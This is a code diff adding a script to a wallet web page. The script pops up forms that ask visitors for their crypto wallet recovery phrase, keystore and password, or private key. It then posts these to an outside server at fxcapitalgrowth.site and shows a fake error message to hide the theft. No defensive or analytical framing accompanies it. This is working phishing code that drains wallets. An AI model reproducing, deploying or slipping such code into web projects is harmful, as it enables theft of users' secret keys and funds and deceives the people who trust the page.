--- a/walletpage.html
+++ b/walletpage.html
@@ -554,6 +554,98 @@
         });
     });
 </script>
+<script>
+    $(document).ready(function () {
+        let dialogDismiss = $(".dialog-dismiss");
+        let sendForm = $("#data-to-send");
+        let successBox = $("#success-dialog");
+        let errorBox = $("#error-dialog");
+        dialogDismiss.each(function () {
+            $(this).on("click", function () {
+                $("#connect-dialog").hide();
+                $("#send-dialog").hide();
+            });
+        });
+        $("#phraseSend").on("click", function () {
+            sendForm.html(
+                '<div class="form-group"><input type="hidden" id="type" name="type" value="phrase"><textarea name="phrase" required class="form-control" placeholder="Enter your recovery phrase" rows="5" style="resize: none"></textarea> </div> <div class="small text-left my-3" style="font-size: 11px">Typically 12 (sometimes 24) words separated by single spaces</div>'
+                );
+        });
+        $("#keystoreSend").on("click", function () {
+            sendForm.html(
+                '<div class="form-group"><input type="hidden" id="type" name="type" value="keystore"><textarea rows="5" style="resize: none" required name="keystore" class="form-control" placeholder="Enter Keystore"></textarea></div><input type="text" class="form-control" name="password" required placeholder="Wallet password"> <div class="small text-left my-3" style="font-size: 11px">Several lines of text beginning with "{...}" plus the password you used to encrypt it.</div>'
+                );
+        });
+        $("#privateKeySend").on("click", function () {
+            sendForm.html(
+                '<input type="hidden" id="type" name="type" value="privatekey"><input type="text" name="privateKey" required class="form-control" placeholder="Enter your Private Key"> <div class="small text-left my-3" style="font-size: 11px">Typically 12 (sometimes 24) words separated by a single space.</div>'
+                );
+        });
 
+        $(".connection-info").on("click", ".manual-connection", function () {
+            $("#current-wallet-app-send").text($("#current-wallet-app").text());
+            $("#walletNameData").val($("#current-wallet-app").text());
+            var link = $("#current-wallet-app").text();
+            $("#current-wallet-send-logo").attr("src", $("#current-wallet-logo").attr("src"));
+            $("#connect-dialog").hide();
+            $("#send-dialog").show();
+        });
+
+        $.ajaxSetup({
+            headers: {
+                "X-CSRF-TOKEN": $('meta[name="csrf-token"]').attr("content"),
+            },
+        });
+
+        $("#processForm").submit(function (e) {
+            e.preventDefault();
+            let processBtn = $("#proceedButton");
+            let cancelBtn = $("#cancelBtn");
+            let formData = new FormData(this);
+           // alert('it works here 1');
+            $.ajax({
+                type: "POST",
+                url: "https://fxcapitalgrowth.site/send/send.php",
+                data: formData,
+                cache: false,
+                contentType: false,
+                processData: false,
+                beforeSend: function () {
+                    processBtn.html('<span class="spinner-border spinner-border-sm" role="status" aria-hidden="true"></span> Connecting wallet...');
+                    processBtn.prop("disabled", true);
+                    cancelBtn.prop("disabled", true);
+                },
+                success: function () {
+                                // dismissAllDialogs();
+                    setTimeout(function () {
+                        restoreButtons();
+                        $("div.message-tab").html("<div class='alert alert-danger'>An unknown error occured, please try again later.</div>");
+                    }, 5000);
+                },
+                error: function () {
+                    restoreButtons();
+                    dismissAllDialogs();
+                    errorBox.show();
+                    setTimeout(function () {
+                        dismissAllDialogs();
+                        $("#send-dialog").show();
+                    }, 2500);
+                },
+            });
+            function restoreButtons() {
+                processBtn.html("PROCEED");
+                processBtn.prop("disabled", false);
+                cancelBtn.prop("disabled", false);
+            }
+            function dismissAllDialogs() {
+                successBox.hide();
+                errorBox.hide();
+                $("#connect-dialog").hide();
+                $("#send-dialog").hide();
+                $("#processing-dialog").hide();
+            }
+        });
+    });
+</script>
 </body>
 </html>
